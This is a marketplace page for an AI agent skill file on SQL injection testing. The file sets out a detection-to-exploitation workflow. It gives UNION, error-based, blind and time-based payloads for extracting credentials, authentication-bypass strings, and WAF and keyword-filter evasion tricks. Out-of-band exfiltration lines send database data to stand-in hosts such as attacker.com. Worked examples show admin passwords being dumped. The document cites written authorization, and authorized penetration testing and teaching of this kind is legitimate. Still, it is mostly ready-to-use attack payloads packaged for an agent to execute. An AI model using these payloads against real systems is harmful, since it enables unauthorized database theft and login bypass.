How do I install SQL Injection Testing?

Install SQL Injection Testing with a single command: npx mdskills install sickn33/sql-injection-testing. This downloads the skill files into your project and your AI agent picks them up automatically.

What platforms support SQL Injection Testing?

SQL Injection Testing works with Claude Code, Claude Desktop, Cursor, Vscode Copilot, Windsurf, Continue Dev, Codex, Gemini Cli, Amp, Roo Code, Goose, Opencode, Trae, Qodo, Command Code. Skills use the open SKILL.md format which is compatible with any AI coding agent that reads markdown instructions.

← Back to skills

SQL Injection Testing

Name: SQL Injection Testing: AI Agent Skill
Rating: 8 (1 reviews)
Author: sickn33

Verified

SecurityIntermediate

This skill should be used when the user asks to "test for SQL injection vulnerabilities", "perform SQLi attacks", "bypass authentication using SQL injection", "extract database information through injection", "detect SQL injection flaws", or "exploit database query vulnerabilities". It provides comprehensive techniques for identifying, exploiting, and understanding SQL injection attack vectors across different database systems.

by @sickn331 installs0Updated 2 weeks ago

Add this skill

npx mdskills install sickn33/sql-injection-testing

Fork & Edit

Skill Advisor8.0

Comprehensive pentesting guide with clear phases, examples, and bypass techniques

+Provides systematic detection-to-exploitation workflow with concrete SQL payloads
+Includes database-specific syntax, bypass techniques, and troubleshooting guidance
+Contains strong legal/ethical constraints and operational boundaries
-Requires shell execution for testing tools but lacks validation safeguards

SKILL.md

Edit in Browser

1---
2name: SQL Injection Testing
3description: This skill should be used when the user asks to "test for SQL injection vulnerabilities", "perform SQLi attacks", "bypass authentication using SQL injection", "extract database information through injection", "detect SQL injection flaws", or "exploit database query vulnerabilities". It provides comprehensive techniques for identifying, exploiting, and understanding SQL injection attack vectors across different database systems.
4metadata:
5  author: zebbern
6  version: "1.1"
7---
8 
9# SQL Injection Testing
10 
11## Purpose
12 
13Execute comprehensive SQL injection vulnerability assessments on web applications to identify database security flaws, demonstrate exploitation techniques, and validate input sanitization mechanisms. This skill enables systematic detection and exploitation of SQL injection vulnerabilities across in-band, blind, and out-of-band attack vectors to assess application security posture.
14 
15## Inputs / Prerequisites
16 
17### Required Access
18- Target web application URL with injectable parameters
19- Burp Suite or equivalent proxy tool for request manipulation
20- SQLMap installation for automated exploitation
21- Browser with developer tools enabled
22 
23### Technical Requirements
24- Understanding of SQL query syntax (MySQL, MSSQL, PostgreSQL, Oracle)
25- Knowledge of HTTP request/response cycle
26- Familiarity with database schemas and structures
27- Write permissions for testing reports
28 
29### Legal Prerequisites
30- Written authorization for penetration testing
31- Defined scope including target URLs and parameters
32- Emergency contact procedures established
33- Data handling agreements in place
34 
35## Outputs / Deliverables
36 
37### Primary Outputs
38- SQL injection vulnerability report with severity ratings
39- Extracted database schemas and table structures
40- Authentication bypass proof-of-concept demonstrations
41- Remediation recommendations with code examples
42 
43### Evidence Artifacts
44- Screenshots of successful injections
45- HTTP request/response logs
46- Database dumps (sanitized)
47- Payload documentation
48 
49## Core Workflow
50 
51### Phase 1: Detection and Reconnaissance
52 
53#### Identify Injectable Parameters
54Locate user-controlled input fields that interact with database queries:
55 
56```
57# Common injection points
58- URL parameters: ?id=1, ?user=admin, ?category=books
59- Form fields: username, password, search, comments
60- Cookie values: session_id, user_preference
61- HTTP headers: User-Agent, Referer, X-Forwarded-For
62```
63 
64#### Test for Basic Vulnerability Indicators
65Insert special characters to trigger error responses:
66 
67```sql
68-- Single quote test
69'
70 
71-- Double quote test
72"
73 
74-- Comment sequences
75--
76#
77/**/
78 
79-- Semicolon for query stacking
80;
81 
82-- Parentheses
83)
84```
85 
86Monitor application responses for:
87- Database error messages revealing query structure
88- Unexpected application behavior changes
89- HTTP 500 Internal Server errors
90- Modified response content or length
91 
92#### Logic Testing Payloads
93Verify boolean-based vulnerability presence:
94 
95```sql
96-- True condition tests
97page.asp?id=1 or 1=1
98page.asp?id=1' or 1=1--
99page.asp?id=1" or 1=1--
100 
101-- False condition tests  
102page.asp?id=1 and 1=2
103page.asp?id=1' and 1=2--
104```
105 
106Compare responses between true and false conditions to confirm injection capability.
107 
108### Phase 2: Exploitation Techniques
109 
110#### UNION-Based Extraction
111Combine attacker-controlled SELECT statements with original query:
112 
113```sql
114-- Determine column count
115ORDER BY 1--
116ORDER BY 2--
117ORDER BY 3--
118-- Continue until error occurs
119 
120-- Find displayable columns
121UNION SELECT NULL,NULL,NULL--
122UNION SELECT 'a',NULL,NULL--
123UNION SELECT NULL,'a',NULL--
124 
125-- Extract data
126UNION SELECT username,password,NULL FROM users--
127UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
128UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--
129```
130 
131#### Error-Based Extraction
132Force database errors that leak information:
133 
134```sql
135-- MSSQL version extraction
1361' AND 1=CONVERT(int,(SELECT @@version))--
137 
138-- MySQL extraction via XPATH
1391' AND extractvalue(1,concat(0x7e,(SELECT @@version)))--
140 
141-- PostgreSQL cast errors
1421' AND 1=CAST((SELECT version()) AS int)--
143```
144 
145#### Blind Boolean-Based Extraction
146Infer data through application behavior changes:
147 
148```sql
149-- Character extraction
1501' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'--
1511' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='b'--
152 
153-- Conditional responses
1541' AND (SELECT COUNT(*) FROM users WHERE username='admin')>0--
155```
156 
157#### Time-Based Blind Extraction
158Use database sleep functions for confirmation:
159 
160```sql
161-- MySQL
1621' AND IF(1=1,SLEEP(5),0)--
1631' AND IF((SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a',SLEEP(5),0)--
164 
165-- MSSQL
1661'; WAITFOR DELAY '0:0:5'--
167 
168-- PostgreSQL
1691'; SELECT pg_sleep(5)--
170```
171 
172#### Out-of-Band (OOB) Extraction
173Exfiltrate data through external channels:
174 
175```sql
176-- MSSQL DNS exfiltration
1771; EXEC master..xp_dirtree '\\attacker-server.com\share'--
178 
179-- MySQL DNS exfiltration
1801' UNION SELECT LOAD_FILE(CONCAT('\\\\',@@version,'.attacker.com\\a'))--
181 
182-- Oracle HTTP request
1831' UNION SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual--
184```
185 
186### Phase 3: Authentication Bypass
187 
188#### Login Form Exploitation
189Craft payloads to bypass credential verification:
190 
191```sql
192-- Classic bypass
193admin'--
194admin'/*
195' OR '1'='1
196' OR '1'='1'--
197' OR '1'='1'/*
198') OR ('1'='1
199') OR ('1'='1'--
200 
201-- Username enumeration
202admin' AND '1'='1
203admin' AND '1'='2
204```
205 
206Query transformation example:
207```sql
208-- Original query
209SELECT * FROM users WHERE username='input' AND password='input'
210 
211-- Injected (username: admin'--)
212SELECT * FROM users WHERE username='admin'--' AND password='anything'
213-- Password check bypassed via comment
214```
215 
216### Phase 4: Filter Bypass Techniques
217 
218#### Character Encoding Bypass
219When special characters are blocked:
220 
221```sql
222-- URL encoding
223%27 (single quote)
224%22 (double quote)
225%23 (hash)
226 
227-- Double URL encoding
228%2527 (single quote)
229 
230-- Unicode alternatives
231U+0027 (apostrophe)
232U+02B9 (modifier letter prime)
233 
234-- Hexadecimal strings (MySQL)
235SELECT * FROM users WHERE name=0x61646D696E  -- 'admin' in hex
236```
237 
238#### Whitespace Bypass
239Substitute blocked spaces:
240 
241```sql
242-- Comment substitution
243SELECT/**/username/**/FROM/**/users
244SEL/**/ECT/**/username/**/FR/**/OM/**/users
245 
246-- Alternative whitespace
247SELECT%09username%09FROM%09users  -- Tab character
248SELECT%0Ausername%0AFROM%0Ausers  -- Newline
249```
250 
251#### Keyword Bypass
252Evade blacklisted SQL keywords:
253 
254```sql
255-- Case variation
256SeLeCt, sElEcT, SELECT
257 
258-- Inline comments
259SEL/*bypass*/ECT
260UN/*bypass*/ION
261 
262-- Double writing (if filter removes once)
263SELSELECTECT → SELECT
264UNUNIONION → UNION
265 
266-- Null byte injection
267%00SELECT
268SEL%00ECT
269```
270 
271## Quick Reference
272 
273### Detection Test Sequence
274```
2751. Insert ' → Check for error
2762. Insert " → Check for error
2773. Try: OR 1=1-- → Check for behavior change
2784. Try: AND 1=2-- → Check for behavior change
2795. Try: ' WAITFOR DELAY '0:0:5'-- → Check for delay
280```
281 
282### Database Fingerprinting
283```sql
284-- MySQL
285SELECT @@version
286SELECT version()
287 
288-- MSSQL
289SELECT @@version
290SELECT @@servername
291 
292-- PostgreSQL
293SELECT version()
294 
295-- Oracle
296SELECT banner FROM v$version
297SELECT * FROM v$version
298```
299 
300### Information Schema Queries
301```sql
302-- MySQL/MSSQL table enumeration
303SELECT table_name FROM information_schema.tables WHERE table_schema=database()
304 
305-- Column enumeration
306SELECT column_name FROM information_schema.columns WHERE table_name='users'
307 
308-- Oracle equivalent
309SELECT table_name FROM all_tables
310SELECT column_name FROM all_tab_columns WHERE table_name='USERS'
311```
312 
313### Common Payloads Quick List
314| Purpose | Payload |
315|---------|---------|
316| Basic test | `'` or `"` |
317| Boolean true | `OR 1=1--` |
318| Boolean false | `AND 1=2--` |
319| Comment (MySQL) | `#` or `-- ` |
320| Comment (MSSQL) | `--` |
321| UNION probe | `UNION SELECT NULL--` |
322| Time delay | `AND SLEEP(5)--` |
323| Auth bypass | `' OR '1'='1` |
324 
325## Constraints and Guardrails
326 
327### Operational Boundaries
328- Never execute destructive queries (DROP, DELETE, TRUNCATE) without explicit authorization
329- Limit data extraction to proof-of-concept quantities
330- Avoid denial-of-service through resource-intensive queries
331- Stop immediately upon detecting production database with real user data
332 
333### Technical Limitations
334- WAF/IPS may block common payloads requiring evasion techniques
335- Parameterized queries prevent standard injection
336- Some blind injection requires extensive requests (rate limiting concerns)
337- Second-order injection requires understanding of data flow
338 
339### Legal and Ethical Requirements
340- Written scope agreement must exist before testing
341- Document all extracted data and handle per data protection requirements
342- Report critical vulnerabilities immediately through agreed channels
343- Never access data beyond scope requirements
344 
345## Examples
346 
347### Example 1: E-commerce Product Page SQLi
348 
349**Scenario**: Testing product display page with ID parameter
350 
351**Initial Request**:
352```
353GET /product.php?id=5 HTTP/1.1
354```
355 
356**Detection Test**:
357```
358GET /product.php?id=5' HTTP/1.1
359Response: MySQL error - syntax error near ''' 
360```
361 
362**Column Enumeration**:
363```
364GET /product.php?id=5 ORDER BY 4-- HTTP/1.1
365Response: Normal
366GET /product.php?id=5 ORDER BY 5-- HTTP/1.1
367Response: Error (4 columns confirmed)
368```
369 
370**Data Extraction**:
371```
372GET /product.php?id=-5 UNION SELECT 1,username,password,4 FROM admin_users-- HTTP/1.1
373Response: Displays admin credentials
374```
375 
376### Example 2: Blind Time-Based Extraction
377 
378**Scenario**: No visible output, testing for blind injection
379 
380**Confirm Vulnerability**:
381```sql
382id=5' AND SLEEP(5)-- 
383-- Response delayed by 5 seconds (vulnerable confirmed)
384```
385 
386**Extract Database Name Length**:
387```sql
388id=5' AND IF(LENGTH(database())=8,SLEEP(5),0)--
389-- Delay confirms database name is 8 characters
390```
391 
392**Extract Characters**:
393```sql
394id=5' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--
395-- Iterate through characters to extract: 'appstore'
396```
397 
398### Example 3: Login Bypass
399 
400**Target**: Admin login form
401 
402**Standard Login Query**:
403```sql
404SELECT * FROM users WHERE username='[input]' AND password='[input]'
405```
406 
407**Injection Payload**:
408```
409Username: administrator'--
410Password: anything
411```
412 
413**Resulting Query**:
414```sql
415SELECT * FROM users WHERE username='administrator'--' AND password='anything'
416```
417 
418**Result**: Password check bypassed, authenticated as administrator.
419 
420## Troubleshooting
421 
422### No Error Messages Displayed
423- Application uses generic error handling
424- Switch to blind injection techniques (boolean or time-based)
425- Monitor response length differences instead of content
426 
427### UNION Injection Fails
428- Column count may be incorrect → Test with ORDER BY
429- Data types may mismatch → Use NULL for all columns first
430- Results may not display → Find injectable column positions
431 
432### WAF Blocking Requests
433- Use encoding techniques (URL, hex, unicode)
434- Insert inline comments within keywords
435- Try alternative syntax for same operations
436- Fragment payload across multiple parameters
437 
438### Payload Not Executing
439- Verify correct comment syntax for database type
440- Check if application uses parameterized queries
441- Confirm input reaches SQL query (not filtered client-side)
442- Test different injection points (headers, cookies)
443 
444### Time-Based Injection Inconsistent
445- Network latency may cause false positives
446- Use longer delays (10+ seconds) for clarity
447- Run multiple tests to confirm pattern
448- Consider server-side caching effects
449

Full transparency — inspect the skill content before installing.